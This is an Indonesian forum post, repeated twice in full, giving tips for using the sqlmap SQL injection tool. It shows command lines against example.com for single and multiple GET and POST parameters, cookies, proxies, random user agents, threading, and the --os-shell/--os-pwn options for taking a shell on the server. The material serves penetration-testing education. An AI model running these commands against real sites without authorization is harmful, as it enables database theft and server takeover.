Assalamualaikum wr wb,
hola backtrackers, apa kabar, ^_^
gimana backtrack nya? makin mahir donk pastinya kan? sudah banyak tutorial yang dipelajari pastinya
udah lama vacum di dunia per-thread-an nih saya, kembali lagi bersama sebuah thread #eh =))
ok let's bekicot
:-
SQLMap merupakan salah satu tools SQL Injection yang paling digemari dikalangan pentester, termasuk ane ,, karena g semua tools automatic yang klak klik sana sini itu bagus juga, #no offense kembaran ane havij
nah kali ini ane berbagi informasi yang diapat, bukan tutorial meng-inject suatu web, tapi tips and trik menggunakan sqlmap dalam melakukan pentest
ada berbagai macam SQL Injection antara lain
1. $_GET
2. $_POST
4. etc(kalau ada selain itu bisa ditambahkan)
kalau tidak salah untuk $_GET dan $_POST itu hampir sama macam2nya mohon di recheck and check
nah, yang selama ini banyak dipraktekan adalah yang nomor 1. tapi itu hanya untuk single paramater/ parameter tunggal, bagaimana kalau parameternya tidak tunggal??
[hide]
berikut tips dan triknya:
$_GET Parameter
1. parameter tunggal
->./sqlmap.py -u " www.example.com/index.php?id=1"
2. parameter non tunggal
->./sqlmap.py -u " www.example.com/index.php?id=1&pageid=5" --param-del="&"
2. $_POST Parameter
1. parameter tunggal
->./sqlmap.py -u "www.example.com/login.php" --data="id=1"
2. parameter non tunggal
->./sqlmap.py -u "www.example.com/login.php" --data="id=1&action=true" --param-del="&"
3. COOKIE SQL
->./sqlmap.py -u "www.example.com/login.php" --data="id=1& val=2" --param="&" --cookies=" JSESSIONID .................." --level=2 --risk=2
4. menggunakan proxy dalam injection
->./sqlmap.py -u " www.example.com/index.php?id=1" --proxy="http://127.0.0.1:8080"
5. menggunakan user-agent secara random
-> ./sqlmap.py -u " www.example.com/index.php?id=1" --random-agent
6. menggunakan multiple thread connections berguna untuk mempercepat retrieve data
->./sqlmap.py -u " www.example.com/index.php?id=1" --threads n
n adalah jumlah threads misal 5
7. integrasi dengan metasploit
-> POSTED by Zee Eichel, mohon disearch threadsnya sudah ada
8. speed up searching tabel dengan options --search
-> POSTED by junior.riau18, mohon disearch threadsnya sudah ada
9. integrasi dengan os
-> ./sqlmap.py -u " www.example.com/index.php?id=1" [--os-shell/--os-pwn]
10. more information
-> PLEASE USE ./sqlmap.py [-h/--help]
nah sekian threads mengenai tips and trik menggunakan SQLMap, The Automatic SQL Injection Tools
[/hide]
semoga bermanfaat
regards
junior.riau18
some source : here
NB: pergunakan untuk kebaikan, bila untuk kejahatan EFFECT ditanggung PEMENANG
hola backtrackers, apa kabar, ^_^
gimana backtrack nya? makin mahir donk pastinya kan? sudah banyak tutorial yang dipelajari pastinya
udah lama vacum di dunia per-thread-an nih saya, kembali lagi bersama sebuah thread #eh =))
ok let's bekicot
:-SQLMap merupakan salah satu tools SQL Injection yang paling digemari dikalangan pentester, termasuk ane ,, karena g semua tools automatic yang klak klik sana sini itu bagus juga, #no offense kembaran ane havij
nah kali ini ane berbagi informasi yang diapat, bukan tutorial meng-inject suatu web, tapi tips and trik menggunakan sqlmap dalam melakukan pentest
ada berbagai macam SQL Injection antara lain
1. $_GET
- Bolean-base Blind
- Error Base
- Time-base Blind
- Stacked Queries
- Union query
- Etc
2. $_POST
- Bolean-base Blind
- Error Base
- Time-base Blind
- Stacked Queries
- Union query
- Etc
4. etc(kalau ada selain itu bisa ditambahkan)
kalau tidak salah untuk $_GET dan $_POST itu hampir sama macam2nya mohon di recheck and check
nah, yang selama ini banyak dipraktekan adalah yang nomor 1. tapi itu hanya untuk single paramater/ parameter tunggal, bagaimana kalau parameternya tidak tunggal??
[hide]
berikut tips dan triknya:
$_GET Parameter
1. parameter tunggal
->./sqlmap.py -u " www.example.com/index.php?id=1"
2. parameter non tunggal
->./sqlmap.py -u " www.example.com/index.php?id=1&pageid=5" --param-del="&"
2. $_POST Parameter
1. parameter tunggal
->./sqlmap.py -u "www.example.com/login.php" --data="id=1"
2. parameter non tunggal
->./sqlmap.py -u "www.example.com/login.php" --data="id=1&action=true" --param-del="&"
3. COOKIE SQL
->./sqlmap.py -u "www.example.com/login.php" --data="id=1& val=2" --param="&" --cookies=" JSESSIONID .................." --level=2 --risk=2
4. menggunakan proxy dalam injection
->./sqlmap.py -u " www.example.com/index.php?id=1" --proxy="http://127.0.0.1:8080"
5. menggunakan user-agent secara random
-> ./sqlmap.py -u " www.example.com/index.php?id=1" --random-agent
6. menggunakan multiple thread connections berguna untuk mempercepat retrieve data
->./sqlmap.py -u " www.example.com/index.php?id=1" --threads n
n adalah jumlah threads misal 5
7. integrasi dengan metasploit
-> POSTED by Zee Eichel, mohon disearch threadsnya sudah ada
8. speed up searching tabel dengan options --search
-> POSTED by junior.riau18, mohon disearch threadsnya sudah ada
9. integrasi dengan os
-> ./sqlmap.py -u " www.example.com/index.php?id=1" [--os-shell/--os-pwn]
10. more information
-> PLEASE USE ./sqlmap.py [-h/--help]
nah sekian threads mengenai tips and trik menggunakan SQLMap, The Automatic SQL Injection Tools
[/hide]
semoga bermanfaat
regards
junior.riau18
some source : here
NB: pergunakan untuk kebaikan, bila untuk kejahatan EFFECT ditanggung PEMENANG